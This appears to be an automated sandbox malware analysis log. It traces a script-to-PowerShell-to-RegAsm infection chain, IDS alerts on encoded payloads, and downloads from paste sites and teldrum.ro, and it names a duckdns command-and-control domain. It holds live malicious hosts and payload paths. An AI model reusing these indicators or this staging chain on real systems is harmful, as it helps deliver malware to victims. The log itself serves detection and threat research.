Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.4:49838 version: TLS 1.2

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe	Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 109.99.162.14:443 -> 192.168.2.4:49742
Source: Network traffic	Suricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 109.99.162.14:443 -> 192.168.2.4:49742

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: expresswealthz.duckdns.org

Connects to a pastebin service (likely for C&C)

Source: unknown	DNS query: name: paste.ee
Source: unknown	DNS query: name: pastebin.com
Source: unknown	DNS query: name: pastebin.com
Source: unknown	DNS query: name: pastebin.com

Potential dropper URLs found in powershell memory

Source: powershell.exe, 00000007.00000002.1892193602.000001DCA7250000.00000004.00000800.00020000.00000000.sdmp	String found in memory: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
Source: powershell.exe, 00000007.00000002.1892193602.000001DCA71C7000.00000004.00000800.00020000.00000000.sdmp	String found in memory: Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
Source: powershell.exe, 00000007.00000002.1892193602.000001DCA71E0000.00000004.00000800.00020000.00000000.sdmp	String found in memory: //analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'

Uses dynamic DNS services

Source: unknown

DNS query: name: expresswealthz.duckdns.org

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 1

Source: global traffic	HTTP traffic detected: GET //images/globalx1.vbs HTTP/1.1Host: teldrum.roConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /jvfvkt/raw/ HTTP/1.1Host: www.pastery.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /d/BO4ecJIA/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /tvwmxe/raw/ HTTP/1.1Host: www.pastery.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /d/ymA7lfHM/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET //images/globalx1.jpg HTTP/1.1Host: teldrum.roConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /gvsgbu/raw/ HTTP/1.1Host: www.pastery.net
Source: global traffic	HTTP traffic detected: GET /d/AmMkBoKd/0 HTTP/1.1Host: paste.ee
Source: global traffic	HTTP traffic detected: GET /raw/2HkMnPyb HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/2HkMnPyb HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/2HkMnPyb HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/2HkMnPyb HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/2HkMnPyb HTTP/1.1Host: pastebin.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 104.20.3.235 104.20.3.235
Source: Joe Sandbox View	IP Address: 104.20.3.235 104.20.3.235
Source: Joe Sandbox View	IP Address: 23.186.113.60 23.186.113.60
Source: Joe Sandbox View	IP Address: 104.21.16.1 104.21.16.1
Source: Joe Sandbox View	IP Address: 104.21.16.1 104.21.16.1

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic	Suricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.4:49737 -> 23.186.113.60:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49745 -> 23.186.113.60:443
Source: Network traffic	Suricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.4:49745 -> 23.186.113.60:443
Source: Network traffic	Suricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.4:49739 -> 23.186.113.60:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49743 -> 104.21.16.1:443

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET //images/globalx1.vbs HTTP/1.1Host: teldrum.roConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /jvfvkt/raw/ HTTP/1.1Host: www.pastery.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /d/BO4ecJIA/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /tvwmxe/raw/ HTTP/1.1Host: www.pastery.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /d/ymA7lfHM/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET //images/globalx1.jpg HTTP/1.1Host: teldrum.roConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /gvsgbu/raw/ HTTP/1.1Host: www.pastery.net
Source: global traffic	HTTP traffic detected: GET /d/AmMkBoKd/0 HTTP/1.1Host: paste.ee
Source: global traffic	HTTP traffic detected: GET /raw/2HkMnPyb HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/2HkMnPyb HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/2HkMnPyb HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/2HkMnPyb HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/2HkMnPyb HTTP/1.1Host: pastebin.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: teldrum.ro
Source: global traffic	DNS traffic detected: DNS query: www.pastery.net
Source: global traffic	DNS traffic detected: DNS query: paste.ee
Source: global traffic	DNS traffic detected: DNS query: pastebin.com
Source: global traffic	DNS traffic detected: DNS query: expresswealthz.duckdns.org

Source: powershell.exe, 0000000F.00000002.2184799462.000001575D8B7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2870958454.000001796B33A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.m
Source: powershell.exe, 0000000F.00000002.2184799462.000001575D8B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mic
Source: powershell.exe, 0000000F.00000002.2184799462.000001575D8B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micft.cMicRosof
Source: powershell.exe, 0000001C.00000002.2039057190.000002287F76E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micros
Source: powershell.exe, 00000010.00000002.2175554194.0000025C47CD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microso
Source: powershell.exe, 00000019.00000002.3173671341.0000012093734000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2039057190.000002287F76E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: powershell.exe, 00000026.00000002.3035311370.000001CA6FF74000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft4
Source: powershell.exe, 00000020.00000002.2016943446.00000179512A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft6
Source: svchost.exe, 00000014.00000002.3429790090.000001A5DA08F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000014.00000003.1795673238.000001A5DA218000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: svchost.exe, 00000014.00000003.1795673238.000001A5DA218000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: svchost.exe, 00000014.00000003.1795673238.000001A5DA218000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: svchost.exe, 00000014.00000003.1795673238.000001A5DA218000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000014.00000003.1795673238.000001A5DA218000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000014.00000003.1795673238.000001A5DA218000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000014.00000003.1795673238.000001A5DA24D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: svchost.exe, 00000014.00000003.1795673238.000001A5DA307000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000002.00000002.1718064602.00000164DAAC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1737747813.00000164E92A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1737747813.00000164E9120000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3039402872.000001DCB6DC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA8764000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1994376877.00000157551D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2026745117.0000025C3F902000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000007.00000002.1892193602.000001DCA8539000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://paste.ee
Source: powershell.exe, 0000001C.00000002.1894952447.0000022801C7D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2133873133.000002002C97C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pastebin.com
Source: powershell.exe, 0000001B.00000002.3234174112.000001B722312000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000F.00000002.1826609476.0000015745388000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1826918415.0000025C2FAB7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000002.00000002.1718064602.00000164D90B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3764327102.0000024DB86F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA6D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1826609476.0000015745161000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1826918415.0000025C2F891000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3244747587.00000120952B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3234174112.000001B722110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1894952447.000002280145B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2019691898.0000017952F7D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2028626210.00000216AD85B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2051302750.000001CA00089000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2133873133.000002002C195000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2329040796.00000208B9378000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000F.00000002.1826609476.0000015745388000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1826918415.0000025C2FAB7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000002.00000002.1718064602.00000164DA709000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA85B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://teldrum.ro
Source: powershell.exe, 00000002.00000002.1718064602.00000164DA750000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000001B.00000002.3234174112.000001B722312000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000001C.00000002.2016217240.000002287F47C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.
Source: powershell.exe, 0000001C.00000002.2039057190.000002287F76E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000007.00000002.1892193602.000001DCA7283000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA84FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.pastery.net
Source: powershell.exe, 0000000F.00000002.2140761876.000001575D62B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://.VisualC.-
Source: powershell.exe, 00000002.00000002.1718064602.00000164D90B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3764327102.0000024DB86F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA6D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1826609476.0000015745161000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1826918415.0000025C2F891000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3244747587.00000120952B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3234174112.000001B7220E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1894952447.000002280145B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1894952447.0000022801472000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2019691898.0000017952F7D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2019691898.0000017952F51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2028626210.00000216AD881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2028626210.00000216AD86D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2051302750.000001CA0004B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2051302750.000001CA00062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2133873133.000002002C15B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2133873133.000002002C16E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2329040796.00000208B9378000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2329040796.00000208B938E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000007.00000002.1892193602.000001DCA7250000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA8594000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA71C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA7283000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA71E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA71F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA84FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://analytics.paste.ee
Source: powershell.exe, 00000007.00000002.1892193602.000001DCA7250000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA8594000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA71C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA7283000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA71F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA84FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://analytics.paste.ee;
Source: powershell.exe, 00000007.00000002.1892193602.000001DCA7250000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA8594000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA71C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA7283000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA71F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA84FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com
Source: powershell.exe, 00000007.00000002.1892193602.000001DCA7250000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA8594000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA71C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA7283000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA71E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA71F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA84FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com;
Source: powershell.exe, 00000010.00000002.2026745117.0000025C3F902000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000010.00000002.2026745117.0000025C3F902000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000010.00000002.2026745117.0000025C3F902000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000006.00000002.3636658679.0000024DB6A1B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3764327102.0000024DB86F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe/6sdjc5.msu
Source: powershell.exe, 00000006.00000002.3636658679.0000024DB6A1B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3764327102.0000024DB86F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe/sakuuo.msu
Source: powershell.exe, 00000007.00000002.1892193602.000001DCA7250000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA8594000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA71C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA7283000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA71E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA71F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA84FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com
Source: powershell.exe, 00000007.00000002.1892193602.000001DCA7250000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA8594000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA71C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA7283000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA71E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA71F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA84FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fonts.gstatic.com;
Source: svchost.exe, 00000014.00000003.1795673238.000001A5DA2C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: svchost.exe, 00000014.00000003.1795673238.000001A5DA272000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: svchost.exe, 00000014.00000003.1795673238.000001A5DA2C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: svchost.exe, 00000014.00000003.1795673238.000001A5DA2A3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.1795673238.000001A5DA2C2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.1795673238.000001A5DA2F4000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.1795673238.000001A5DA2E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000014.00000003.1795673238.000001A5DA2C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: powershell.exe, 0000001B.00000002.3234174112.000001B722312000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1718064602.00000164D9EB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2019691898.000001795345D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2028626210.00000216ADD5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2051302750.000001CA00543000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.1740974865.00000164F121C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://go.microsoft.co
Source: powershell.exe, 00000002.00000002.1718064602.00000164DAAC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1737747813.00000164E9120000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3039402872.000001DCB6DC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA8764000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1994376877.00000157551D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2026745117.0000025C3F902000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 00000014.00000003.1795673238.000001A5DA2C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: svchost.exe, 00000014.00000003.1795673238.000001A5DA272000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: powershell.exe, 00000002.00000002.1718064602.00000164DA750000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000002.00000002.1718064602.00000164DA750000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX
Source: powershell.exe, 00000007.00000002.1892193602.000001DCA8523000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA7283000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA71E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee
Source: powershell.exe, 00000007.00000002.1892193602.000001DCA7283000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/AmMkBoKd/0
Source: powershell.exe, 00000007.00000002.1892193602.000001DCA7283000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/ammkbokd/0
Source: powershell.exe, 00000007.00000002.1892193602.000001DCA8523000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA71E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/ymA7lfHM/0
Source: powershell.exe, 00000007.00000002.1892193602.000001DCA8523000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/yma7lfhm/0x
Source: powershell.exe, 00000007.00000002.1892193602.000001DCA8523000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://paste.eeX(
Source: powershell.exe, 0000001C.00000002.1894952447.0000022801A23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2133873133.000002002C6C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2133873133.000002002C976000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com
